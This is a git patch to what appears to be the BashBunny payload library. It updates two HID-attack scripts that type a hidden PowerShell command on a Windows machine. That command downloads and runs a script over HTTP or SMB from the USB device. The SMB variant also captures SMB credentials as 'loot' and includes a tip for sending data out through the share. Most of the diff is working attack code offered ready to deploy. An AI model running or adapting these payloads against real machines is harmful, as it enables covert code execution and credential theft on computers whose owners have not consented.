From 91c7c2276f24e97b1a43926d107e4a5bf9ddfef5 Mon Sep 17 00:00:00 2001 From: Hink Date: Wed, 11 Oct 2017 11:42:03 -0500 Subject: [PATCH] cleaned up and extended --- .../psh_DownloadExec/{psh.txt => p.txt} | 0 .../execution/psh_DownloadExec/payload.txt | 36 ++++++----- .../execution/psh_DownloadExec/readme.md | 2 +- .../psh_DownloadExecSMB/{psh.txt => p.txt} | 0 .../execution/psh_DownloadExecSMB/payload.txt | 60 +++++++++---------- .../execution/psh_DownloadExecSMB/readme.md | 10 +++- 6 files changed, 55 insertions(+), 53 deletions(-) rename payloads/library/execution/psh_DownloadExec/{psh.txt => p.txt} (100%) rename payloads/library/execution/psh_DownloadExecSMB/{psh.txt => p.txt} (100%) diff --git a/payloads/library/execution/psh_DownloadExec/psh.txt b/payloads/library/execution/psh_DownloadExec/p.txt similarity index 100% rename from payloads/library/execution/psh_DownloadExec/psh.txt rename to payloads/library/execution/psh_DownloadExec/p.txt diff --git a/payloads/library/execution/psh_DownloadExec/payload.txt b/payloads/library/execution/psh_DownloadExec/payload.txt index e0e55353..a4b11ddf 100644 --- a/payloads/library/execution/psh_DownloadExec/payload.txt +++ b/payloads/library/execution/psh_DownloadExec/payload.txt @@ -8,7 +8,8 @@ # Attackmodes: HID, RNDIS_ETHERNET # Firmware: >= 1.3 # -# Quick HID attack to retrieve and run powershell payload from BashBunny web server - ensure psh.txt exists in payload directory +# Quick HID attack to retrieve and run powershell payload from BashBunny web server +# ensure p.txt (your powershell payload) exists in payload directory # # | Attack Stage | Description | # | ------------------- | ---------------------------------------- | @@ -18,41 +19,38 @@ ATTACKMODE RNDIS_ETHERNET HID LED SETUP +REQUIRETOOL gohttp GET HOST_IP GET SWITCH_POSITION -# Set working dir -PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION -SERVER_LOG=$PAYLOAD_DIR/server.log +# DEFINE DIRECTORIES +PAYLOAD_DIR=/root/udisk/payloads/${SWITCH_POSITION} +SERVER_LOG=/tmp/server.log -# Fresh Server Log -rm -f $SERVER_LOG +# SERVER LOG +rm -f ${SERVER_LOG} -# Check for gohttp -REQUIRETOOL gohttp - -# Start web server +# START HTTP SERVER iptables -A OUTPUT -p udp --dport 53 -j DROP # disallow outgoing dns requests so server starts immediately -/usr/bin/gohttp -p 80 -d $PAYLOAD_DIR > $SERVER_LOG 2>&1 & +/tools/gohttp/gohttp -p 80 -d /tmp/ > ${SERVER_LOG} 2>&1 & -# Check for psh.txt -if [ ! -f $PAYLOAD_DIR/psh.txt ]; then +# CHECK FOR POWERSHELL +if [ ! -f ${PAYLOAD_DIR}/p.txt ]; then LED FAIL2 exit 1 fi +cp -R ${PAYLOAD_DIR}/* /tmp/ # any additional assets will be available in tmp -# Attack HID +# STAGE 1 - POWERSHELL LED STAGE1 -# Attack (abbreviations to allow run execution) -RUN WIN "powershell -WindowStyle Hidden \"\$web=New-Object Net.WebClient;while (\$TRUE) {If ((New-Object net.sockets.tcpclient ('$HOST_IP','80')).Connected) {iex \$web.DownloadString('http://$HOST_IP/psh.txt');\$web.DownloadString('http://172.16.64.1/DONE');exit}}\"" +RUN WIN "powershell -WindowStyle Hidden \"\$web=New-Object Net.WebClient;while (\$TRUE) {If ((New-Object net.sockets.tcpclient ('${HOST_IP}','80')).Connected) {iex \$web.DownloadString('http://${HOST_IP}/p.txt');\$web.DownloadString('http://172.16.64.1/DONE');exit}}\"" # Remove tracks in the psh payload if you wish -# Attack Ethernet +# STAGE 2 - WAIT LED STAGE2 - -while ! grep -Fq "GET \"/DONE\"" $SERVER_LOG; do +while ! grep -Fq "GET \"/DONE\"" ${SERVER_LOG}; do sleep .5 done diff --git a/payloads/library/execution/psh_DownloadExec/readme.md b/payloads/library/execution/psh_DownloadExec/readme.md index 5d96fd13..1f61836e 100644 --- a/payloads/library/execution/psh_DownloadExec/readme.md +++ b/payloads/library/execution/psh_DownloadExec/readme.md @@ -14,7 +14,7 @@ Quick HID attack to retrieve and run powershell payload from BashBunny web serve ## Configuration -Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed. +Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed. ## Requirements diff --git a/payloads/library/execution/psh_DownloadExecSMB/psh.txt b/payloads/library/execution/psh_DownloadExecSMB/p.txt similarity index 100% rename from payloads/library/execution/psh_DownloadExecSMB/psh.txt rename to payloads/library/execution/psh_DownloadExecSMB/p.txt diff --git a/payloads/library/execution/psh_DownloadExecSMB/payload.txt b/payloads/library/execution/psh_DownloadExecSMB/payload.txt index b05f2e2d..acc568ac 100644 --- a/payloads/library/execution/psh_DownloadExecSMB/payload.txt +++ b/payloads/library/execution/psh_DownloadExecSMB/payload.txt @@ -2,23 +2,23 @@ # # Title: Powershell Download and Execute SMB # Author: LowValueTarget -# Version: 1.2 +# Version: 2.0 # Category: Powershell # Target: Windows XP SP3+ (Powershell) # Attackmodes: HID, RNDIS_ETHERNET # Firmware: >= 1.2 # -# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot. -# Ensure psh.txt exists in payload directory +# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Possibilities are limitless! +# Credentials captured by are stored as loot. +# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures) # -# Requires Impacket is installed (python ./impacket/setup.py install) +# Required tools: impacket # # | Attack Stage | Description | # | ------------------- | ------------------------------| # | Stage 1 | Powershell | # | Stage 2 | Delivering powershell payload | # - ATTACKMODE RNDIS_ETHERNET HID # SETUP @@ -29,48 +29,48 @@ GET SWITCH_POSITION GET TARGET_HOSTNAME GET HOST_IP +# DEFINE DIRECTORIES PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION -# Check for psh.txt -if [ ! -f ${PAYLOAD_DIR}/psh.txt ]; then +LOOTDIR_BB=/root/udisk/loot/psh_DownloadExecSMB + +mkdir -p /tmp/{l,p} + +# CHECK FOR POWERSHELL +if [ ! -f ${PAYLOAD_DIR}/p.txt ]; then LED FAIL exit 1 fi -cp -R ${PAYLOAD_DIR}/* /tmp/ +cp -R ${PAYLOAD_DIR}/* /tmp/p/ # any additional assets will be available in tmp -LOOTDIR=/root/udisk/loot/psh_DownloadExecSMB -# Setup named logs in loot directory -mkdir -p ${LOOTDIR} +# GET HOSTNAME HOST=${TARGET_HOSTNAME} -# If hostname is blank set it to "noname" -[[ -z "$HOST" ]] && HOST="noname" -COUNT=$(ls -lad ${LOOTDIR}/$HOST* | wc -l) +[[ -z "${HOST}" ]] && HOST="noname" +COUNT=$(ls -lad ${LOOTDIR_BB}/${HOST}* | wc -l) COUNT=$((COUNT+1)) -mkdir -p ${LOOTDIR}/${HOST}-$COUNT +mkdir -p ${LOOTDIR_BB}/${HOST}-${COUNT} +LOOTDIR_BB=${LOOTDIR_BB}/${HOST}-${COUNT} -# Log file -LOGFILE=psh_smb.log +# START SMB SERVER +LOGFILE=/tmp/l/psh_downloadsmb.log +touch ${LOGFILE} +python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp > ${LOGFILE} & -# Start SMB Server -mkdir -p /loot -python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp/ > /loot/${LOGFILE} & - -# STAGE 1 - Powershell +# STAGE 1 - POWERSHELL LED STAGE1 +RUN WIN "powershell -WindowStyle Hidden \"while (\$true) {If ((New-Object net.sockets.tcpclient(${HOST_IP},445)).Connected) {iex (New-Object Net.WebClient).DownloadString('\\\\${HOST_IP}\\s\\p\\p.txt');New-Item \\\\${HOST_IP}\\s\\COMPLETE -ItemType file;exit}}\"" +# TIP: To exfil any data, upload to \\172.16.64.1\s\l\ -- this will be copied to the BB as loot +# TIP: Remove tracks in the psh payload if you wish -RUN WIN "powershell -WindowStyle Hidden \"while (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) { iex (New-Object Net.WebClient).DownloadString('\\\\$HOST_IP\\s\\psh.txt');New-Item \\\172.16.64.1\\s\\COMPLETE -ItemType file;exit}}\"" -# Remove tracks in the psh payload if you wish - -# STAGE 2 - Wait until payload retrieved -# Wait until payload is retrieved +# STAGE 2 - HURRY UP AND WAIT LED STAGE2 while ! [ -f /tmp/COMPLETE ]; do sleep 0.5; done # CLEANUP LED CLEANUP -# Move loot to mass storage -mv /loot/${LOGFILE} ${LOOTDIR}/${HOST}-$COUNT -rm /loot/${LOGFILE} +# STASH THE LOOT +mv /tmp/l/* ${LOOTDIR_BB}/ +rm -rf /tmp/{l,p} # Sync file system sync diff --git a/payloads/library/execution/psh_DownloadExecSMB/readme.md b/payloads/library/execution/psh_DownloadExecSMB/readme.md index 42c29490..e8358628 100644 --- a/payloads/library/execution/psh_DownloadExecSMB/readme.md +++ b/payloads/library/execution/psh_DownloadExecSMB/readme.md @@ -10,12 +10,16 @@ ## Description -Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot. +Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. SMB Credentials are stored as loot. ## Configuration -* Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed. -* Requires Impacket is installed (python ./impacket/setup.py install) +* Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed. +* Requires Impacket + +__Installation__ + +See Hak5's Tool Thread Here: https://forums.hak5.org/index.php?/topic/40971-info-tools/ ## STATUS